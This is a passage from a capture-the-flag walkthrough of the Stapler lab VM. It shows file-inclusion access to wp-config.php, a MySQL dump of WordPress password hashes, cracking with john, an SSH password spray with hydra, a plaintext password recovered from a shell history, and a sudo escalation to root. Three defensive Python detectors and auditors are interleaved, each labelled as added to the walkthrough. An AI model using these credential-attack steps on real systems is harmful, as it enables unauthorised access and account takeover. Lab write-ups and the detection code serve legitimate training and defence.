if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

With the LFI we obtained the contents of wp-config.php. The MySQL service was open in the nmap output, so now let's connect to it.
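What the LFI leaves behind on the server is PHP source stored under wp-content/uploads with an image name (1022270830.jpeg above). The Python script below is an added example, not from this walkthrough, that audits an uploads tree for image-named files whose leading bytes are not an image, and also catches a real image header with a PHP tag appended. It builds a small constructed tree in a temporary directory (one file with a JPEG header, one PHP file named .jpeg, one non-image name that is left alone) so it runs offline; the file names and the magic-byte table are assumptions for the example.

```python
# Added example, not from the original walkthrough: find files under a
# WordPress uploads directory whose contents do not match their image extension.
import os
import tempfile
from typing import Dict, List

# Leading bytes of the image formats WordPress normally stores (assumed table).
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
IMAGE_EXTENSIONS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}


def classify_bytes(data: bytes) -> str:
    """Name the real content type from its leading bytes; note PHP tags even inside a valid image."""
    kind = "unknown"
    for magic, name in IMAGE_MAGIC.items():
        if data.startswith(magic):
            kind = name
            break
    if b"<?php" in data[:4096].lower():
        # a bare PHP file, or an image/PHP polyglot that a magic check alone would pass
        kind = "php-source" if kind == "unknown" else kind + "+php-source"
    return kind


def audit_uploads(root: str) -> List[Dict[str, str]]:
    """Walk an uploads tree and report image-named files whose detected type differs from the name."""
    findings: List[Dict[str, str]] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            if ext not in IMAGE_EXTENSIONS:
                continue  # only files that claim to be images are in scope here
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                detected = classify_bytes(fh.read(4096))
            declared = IMAGE_EXTENSIONS[ext]
            if detected != declared:
                findings.append({
                    "path": os.path.relpath(full, root),
                    "declared": declared,
                    "detected": detected,
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree() -> str:
    """Create a constructed uploads tree in a temp dir: one JPEG header, one PHP file disguised as .jpeg."""
    root = tempfile.mkdtemp(prefix="uploads-")
    os.makedirs(os.path.join(root, "2016", "06"))
    with open(os.path.join(root, "2016", "06", "real.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 32)  # JPEG/JFIF header, padded
    with open(os.path.join(root, "1022270830.jpeg"), "wb") as fh:
        fh.write(b"<?php\n/** The base configurations of the WordPress. */\ndefine('DB_NAME', 'wordpress');\n")
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"not an image name, so not audited\n")
    return root


if __name__ == "__main__":
    for f in audit_uploads(build_sample_tree()):
        print(f"{f['path']}: named as {f['declared']}, contains {f['detected']}")
```

Run against a real tree, the output points at files worth comparing with the wp_posts/wp_postmeta attachment records the plugin created, since each abusive request leaves both an upload and a post behind.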

┌──(root💀kali)-[/home/kali]
└─# mysql -u root -h 192.168.0.25 -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.007 sec)

MySQL [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.002 sec)

MySQL [wordpress]> select * from ep_users;
ERROR 1146 (42S02): Table 'wordpress.ep_users' doesn't exist
MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          | [email protected]    | http://localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          | [email protected]    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |
|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | [email protected]   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |
|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | [email protected]   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |
|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | [email protected] |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |
|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | [email protected]   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |
|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | [email protected]   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |
|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | [email protected]   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |
|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | [email protected]   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |
| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | [email protected]     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |
| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | [email protected]     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |
| 12 | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | [email protected]    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |
| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon         | [email protected]   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |
| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby          | [email protected]    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |
| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | [email protected]   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |
| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | [email protected]     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.002 sec)

MySQL [wordpress]> select concat_ws(‘:’, user_login, user_pass) from wp_users;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':’, user_login, user_pass) from wp_users' at line 1
MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users;
+--------------------------------------------+
| concat_ws(':', user_login, user_pass)      |
+--------------------------------------------+
| John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.    |
| Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0    |
| Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0   |
| barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0   |
| heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1   |
| harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0   |
| scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1   |
| kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0   |
| tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0     |
| ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1     |
| Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.    |
| Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0   |
| Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.    |
| Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131   |
| Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0     |
+--------------------------------------------+
16 rows in set (0.002 sec)

From these, together with the users I had obtained via SMB, I created a users file. I then used john to crack the hashes, which are in phpass format.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt --rules --format=phpass
Using default input encoding: UTF-8
Loaded 16 password hashes with 16 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cookie           (scott)
monkey           (harry)
football         (garry)
coolgirl         (kathy)
washere          (barry)
incorrect        (John)
thumb            (tim)
0520             (Pam)
passphrase       (heather)
damachine        (Dave)
ylle             (Elly)
┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat users 
elly
NATHAN
zoe
kai
mel
Taylor
SHAY
jess
Drew
Sam
jamie
JLipps
LSolum2
Eeth
CJoo
JKanode
CCeaser
SStroud
MFrei
IChadwick
JBare
MBassin
SHayslett
AParnell
DSwanger
ETollefson
RNunemaker
peter
root

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat pass 
cookie
monkey
football
coolgirl
washere
incorrect
thumb
0520
plbkac

We know the SSH service is open, so I launched an attack with hydra using the information we have.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# hydra -L users -P pass  ssh://192.168.0.25 -e nsr >> hydra_result

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat hydra_result
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-30 14:56:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 348 login tries (l:29/p:12), ~22 tries per task
[DATA] attacking ssh://192.168.0.25:22/
[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac
[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac
[STATUS] 115.00 tries/min, 115 tries in 00:01h, 235 to do in 00:03h, 16 active
[22][ssh] host: 192.168.0.25   login: JBare   password: cookie
[22][ssh] host: 192.168.0.25   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-30 14:59:35
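
The hydra run above is loud on the target: 348 attempts in about three minutes from one address, across 29 user names, followed by a successful login. The detector below is an added example, not part of the VM or of hydra, that finds exactly that pattern in sshd's `auth.log` lines: a sliding window over "Failed password" events per source, with any "Accepted password" from the same source after the burst flagged as the account to act on first. The log excerpt in `sample_log()` is constructed for the demo, and the year is assumed because syslog timestamps do not carry one.

```python
"""SSH password-guessing detector, added to this walkthrough as an example.
It is not part of the VM, of hydra or of any tool named above; it parses sshd
lines in the auth.log format and reports a source that produces many
"Failed password" events inside a short window, plus any "Accepted password"
for that source after the burst.  The excerpt in sample_log() is constructed."""
import re
from collections import defaultdict
from datetime import datetime

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2"
)
ASSUMED_YEAR = 2021  # syslog timestamps carry no year; assumed for the demo


def parse_line(line):
    """Return (timestamp, 'Failed'|'Accepted', user, source) or None for other lines."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Map source IP -> finding for every source with >= threshold failures
    inside any window_seconds window.  'accepted' lists users whose login from
    that source succeeded once the burst had started."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e[0])
    per_src = defaultdict(list)
    for ts, result, user, src in events:
        per_src[src].append((ts, result, user))
    findings = {}
    for src, evs in per_src.items():
        fails = [(ts, user) for ts, result, user in evs if result == "Failed"]
        burst_start = None
        left = 0
        for right, (ts, _) in enumerate(fails):       # sliding window over failures
            while (ts - fails[left][0]).total_seconds() > window_seconds:
                left += 1
            if right - left + 1 >= threshold:
                burst_start = ts
                break
        if burst_start is None:
            continue
        accepted = [user for ts, result, user in evs
                    if result == "Accepted" and ts >= burst_start]
        findings[src] = {
            "failures": len(fails),
            "distinct_users": len({user for _, user in fails}),
            "accepted": accepted,
        }
    return findings


def sample_log():
    """Constructed auth.log excerpt: twelve guesses in twelve seconds from one
    host, then a success for JBare, plus one unrelated failure from another host."""
    users = ["elly", "NATHAN", "zoe", "kai", "mel", "Taylor",
             "SHAY", "jess", "Drew", "Sam", "jamie", "JLipps"]
    lines = [
        f"May 30 14:56:{40 + i:02d} red sshd[{2100 + i}]: Failed password for {u} "
        f"from 192.168.0.21 port {51000 + i} ssh2"
        for i, u in enumerate(users)
    ]
    lines.append("May 30 14:56:55 red sshd[2199]: Accepted password for JBare "
                 "from 192.168.0.21 port 51050 ssh2")
    lines.append("May 30 14:10:01 red sshd[1900]: Failed password for peter "
                 "from 192.168.0.30 port 40000 ssh2")
    return lines


if __name__ == "__main__":
    for src, info in detect_bruteforce(sample_log()).items():
        print(src, info)
```

The "many users, one source" shape (`distinct_users` close to `failures`) is what separates a password spray like this one from a single user mistyping a password; fail2ban-style per-source lockouts catch it, and so does simply refusing password authentication for SSH in favour of keys.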

Great, now we can connect over SSH.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ssh [email protected]                                                                                                                                                                                                             255 ⨯
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
[email protected]'s password: 
Welcome back!

JBare@red:~$ whoami
JBare
JBare@red:~$ cd /tmp/

From this point on I will carry out enumeration with the https://github.com/kudayDOTsite/linux-smart-enumeration project. I copied the relevant sh file to the target machine.

JBare@red:/tmp$ wget http://192.168.0.21:1822/lse.sh
--2021-05-30 23:03:57--  http://192.168.0.21:1822/lse.sh
Connecting to 192.168.0.21:1822... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41177 (40K) [text/x-sh]
Saving to: ‘lse.sh’

lse.sh                                                      100%[========================================================================================================================================>]  40.21K  --.-KB/s    in 0s      

2021-05-30 23:03:57 (199 MB/s) - ‘lse.sh’ saved [41177/41177]

JBare@red:/tmp$ chmod 777 lse.sh

And I started it.

JBare@red:/tmp$ ./lse.sh -l2  >> result.txt
If you know the current user password, write it here to check sudo privileges: cookie

What I show here is only a small part of the results:

[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
---
total 24
drwxr-xr-x  2 AParnell AParnell 4096 Jun  5  2016 .
drwxr-xr-x 32 root     root     4096 Jun  4  2016 ..
-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history
-rw-r--r--  1 AParnell AParnell  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 AParnell AParnell 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 AParnell AParnell  675 Sep  1  2015 .profile
total 24
drwxr-xr-x  2 CCeaser CCeaser 4096 Jun  5  2016 .
drwxr-xr-x 32 root    root    4096 Jun  4  2016 ..
-rw-r--r--  1 root    root      10 Jun  5  2016 .bash_history
-rw-r--r--  1 CCeaser CCeaser  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 CCeaser CCeaser 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 CCeaser CCeaser  675 Sep  1  2015 .profile
total 24
drwxr-xr-x  2 CJoo CJoo 4096 Jun  5  2016 .
drwxr-xr-x 32 root root 4096 Jun  4  2016 ..
-rw-r--r--  1 root root    5 Jun  5  2016 .bash_history
-rw-r--r--  1 CJoo CJoo  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 CJoo CJoo 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 CJoo CJoo  675 Sep  1  2015 .profile
total 24
drwxr-xr-x  2 DSwanger DSwanger 4096 Jun  5  2016 .
drwxr-xr-x 32 root     root     4096 Jun  4  2016 ..
-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history
-rw-r--r--  1 DSwanger DSwanger  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 DSwanger DSwanger 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 DSwanger DSwanger  675 Sep  1  2015 .profile

We can see a .bash_history under every user's home, and it is owned by root. Based on this, I did the following.

JBare@red:/home$ ls -l
total 120
drwxr-xr-x 2 AParnell   AParnell   4096 Jun  5  2016 AParnell
drwxr-xr-x 2 CCeaser    CCeaser    4096 Jun  5  2016 CCeaser
drwxr-xr-x 2 CJoo       CJoo       4096 Jun  5  2016 CJoo
drwxr-xr-x 2 Drew       Drew       4096 Jun  5  2016 Drew
drwxr-xr-x 2 DSwanger   DSwanger   4096 Jun  5  2016 DSwanger
drwxr-xr-x 2 Eeth       Eeth       4096 Jun  5  2016 Eeth
drwxr-xr-x 2 elly       elly       4096 Jun  5  2016 elly
drwxr-xr-x 2 ETollefson ETollefson 4096 Jun  5  2016 ETollefson
drwxr-xr-x 2 IChadwick  IChadwick  4096 Jun  5  2016 IChadwick
drwxr-xr-x 2 jamie      jamie      4096 Jun  5  2016 jamie
drwxr-xr-x 3 JBare      JBare      4096 May 30 22:24 JBare
drwxr-xr-x 2 jess       jess       4096 Jun  5  2016 jess
drwxr-xr-x 2 JKanode    JKanode    4096 Jun  5  2016 JKanode
drwxr-xr-x 2 JLipps     JLipps     4096 Jun  5  2016 JLipps
drwxr-xr-x 2 kai        kai        4096 Jun  5  2016 kai
drwxr-xr-x 2 LSolum     LSolum     4096 Jun  5  2016 LSolum
drwxr-xr-x 2 LSolum2    LSolum2    4096 Jun  5  2016 LSolum2
drwxr-xr-x 2 MBassin    MBassin    4096 Jun  5  2016 MBassin
drwxr-xr-x 2 mel        mel        4096 Jun  5  2016 mel
drwxr-xr-x 2 MFrei      MFrei      4096 Jun  5  2016 MFrei
drwxr-xr-x 2 NATHAN     NATHAN     4096 Jun  5  2016 NATHAN
drwxr-xr-x 3 peter      peter      4096 Jun  3  2016 peter
drwxr-xr-x 2 RNunemaker RNunemaker 4096 Jun  5  2016 RNunemaker
drwxr-xr-x 2 Sam        Sam        4096 Jun  5  2016 Sam
drwxr-xr-x 2 SHAY       SHAY       4096 Jun  5  2016 SHAY
drwxr-xr-x 3 SHayslett  SHayslett  4096 May 30 22:24 SHayslett
drwxr-xr-x 2 SStroud    SStroud    4096 Jun  5  2016 SStroud
drwxr-xr-x 2 Taylor     Taylor     4096 Jun  5  2016 Taylor
drwxrwxrwx 2 www        www        4096 Jun  5  2016 www
drwxr-xr-x 3 zoe        zoe        4096 May 30 22:57 zoe
JBare@red:/home$ cat AParnell/.bash
cat: AParnell/.bash: No such file or directory
JBare@red:/home$ cat AParnell/.bash_history 
exit
JBare@red:/home$ cat CCeaser/.bash_history 
free
exit
JBare@red:/home$ cat CJoo/.bash_history 
exit
JBare@red:/home$ cat Drew/.bash_history 
exit
JBare@red:/home$ cat DSwanger/.bash_history 
exit
JBare@red:/home$ cat Eeth/.bash_history 
exit
JBare@red:/home$ cat elly/.bash_history 
exit
JBare@red:/home$ cat ETollefson/.bash_history 
exit
JBare@red:/home$ cat IChadwick/.bash_history 
exit
JBare@red:/home$ cat jamie/.bash_history 
top
ps aux
exit
JBare@red:/home$ cat JBare/.bash_history 
exit
JBare@red:/home$ cat jess/.bash_history 
exit
JBare@red:/home$ cat JKanode/.bash_history 
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
JBare@red:/home$ 
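
Two things went wrong together here: every home directory and history file is readable by everyone, and one history holds an `sshpass -p` line with a plaintext password. The audit below is an added example for this walkthrough, not lse.sh and not code from the VM, that checks both conditions the way a defender would run it over `/home`: it flags history files other users can read, compares the file owner with the home owner (a root-owned `.bash_history` in a user's home, as on this VM, is worth a look), and reports credential-shaped lines with the secret masked so the report itself does not leak it. `build_demo_home()` constructs a throwaway `/home` look-alike in a temp dir, and `SECRET_PATTERNS` is a small assumed set rather than a complete one.

```python
"""Home-directory history audit, added to this walkthrough as an example.
It is not lse.sh and not code from the VM; it reproduces, as a defender's check,
the two conditions that exposed peter's password above: a user's home directory
and shell history readable by everyone, and a command line in that history
carrying a secret (sshpass -p ...).  build_demo_home() constructs a throwaway
/home look-alike; SECRET_PATTERNS is a small assumed set, not a complete one."""
import os
import re
import stat
import tempfile
from pathlib import Path

HISTORY_FILES = (".bash_history", ".zsh_history", ".mysql_history", ".python_history")
SECRET_PATTERNS = [                       # assumed, extend to taste
    re.compile(r"\bsshpass\s+-p\s*\S+"),
    re.compile(r"\bmysql\b.*\s-p\S+"),
    re.compile(r"\b(?:curl|wget)\b.*(?:--password|-u\s+\S+:\S+)"),
    re.compile(r"(?i)\b(?:password|passwd|token)=\S+"),
]
# Blank the value after '-p', '=' or a 'user:' prefix; leave 'http://' alone.
MASK_RE = re.compile(r"(-p\s*|=|(?<=\w):(?!/))(\S+)")


def mask(line):
    return MASK_RE.sub(lambda m: m.group(1) + "****", line)


def others_can_read(path):
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_home(home_root):
    """One finding per history file that is world-readable or contains a
    secret-looking command line."""
    findings = []
    for user_dir in sorted(Path(home_root).iterdir()):
        if not user_dir.is_dir():
            continue
        for name in HISTORY_FILES:
            hist = user_dir / name
            if not hist.is_file():
                continue
            try:
                lines = hist.read_text(errors="replace").splitlines()
            except PermissionError:
                continue                  # private to its owner: nothing to report
            exposed = others_can_read(user_dir) and others_can_read(hist)
            secrets = [mask(l) for l in lines if any(p.search(l) for p in SECRET_PATTERNS)]
            if exposed or secrets:
                findings.append({
                    "user": user_dir.name,
                    "file": str(hist),
                    "world_readable": exposed,
                    "owner_mismatch": hist.stat().st_uid != user_dir.stat().st_uid,
                    "secrets": secrets,
                })
    return findings


def build_demo_home():
    """Constructed /home look-alike (not the VM's): two world-readable homes, one
    history with an sshpass password, and one private (0700) home with a mysql -p."""
    root = Path(tempfile.mkdtemp(prefix="home-audit-"))
    demo = [
        ("JKanode", 0o755, ["id", "sshpass -p s3cr3t-demo ssh JKanode@localhost", "exit"]),
        ("CCeaser", 0o755, ["free", "exit"]),
        ("peter", 0o700, ["mysql -u root -pdemo-pass wordpress", "exit"]),
    ]
    for user, mode, history in demo:
        d = root / user
        d.mkdir()
        d.chmod(mode)
        h = d / ".bash_history"
        h.write_text("\n".join(history) + "\n")
        h.chmod(0o644)
    return root


if __name__ == "__main__":
    for finding in audit_home(build_demo_home()):
        print(finding)
```

The fixes are the usual ones: home directories at 0750 or 0700 (`adduser` honours `DIR_MODE` in `/etc/adduser.conf` on Debian-derived systems), `HISTCONTROL=ignorespace` or `HISTIGNORE` for commands that must carry a secret, and tools like `sshpass` replaced by keys or an agent so the password never appears on a command line in the first place.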

This is great, because when I ran the lse.sh script it had also given me the following information.

[*] usr020 Are there other users in an administrative groups?.............. yes!
---
sudo:x:27:peter
---
[*] usr030 Other users with shell.......................................... yes!
---

The peter user is a member of the sudo group! So I switched to the peter user.

JBare@red:/home$ su peter
Password: 

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- 

Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% ls
AParnell  CCeaser  CJoo  Drew  DSwanger  Eeth  elly  ETollefson  IChadwick  jamie  JBare  jess  JKanode  JLipps  kai  LSolum  LSolum2  MBassin  mel  MFrei  NATHAN  peter  RNunemaker  Sam  SHAY  SHayslett  SStroud  Taylor  www  zoe
red% whoami
peter
red% 

Okay! Let's finish the job.

red% whoami
peter
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Sorry, try again.
[sudo] password for peter: 
➜  /home whoami
root
➜  /home cd /root 
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt 
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Note:
While solving the box I tried privilege escalation exploits based on the outputs below, but I could not get a result, even though the versions looked extremely suitable...

➜  ~ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
➜  ~ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:    16.04
Codename:   xenial
└─# searchsploit ubuntu linux kernel Local Privilege 4.4
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                                                                                            | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                                                                                                           | linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                                                                        | linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation                                                                                                    | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation                                                                                                | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                                                                                               | linux/local/39772.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                                                                              | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                                                                     | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                                                                                          | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                                                                                                      | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)                                                                                  | linux/local/47169.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Category: Walkthrough
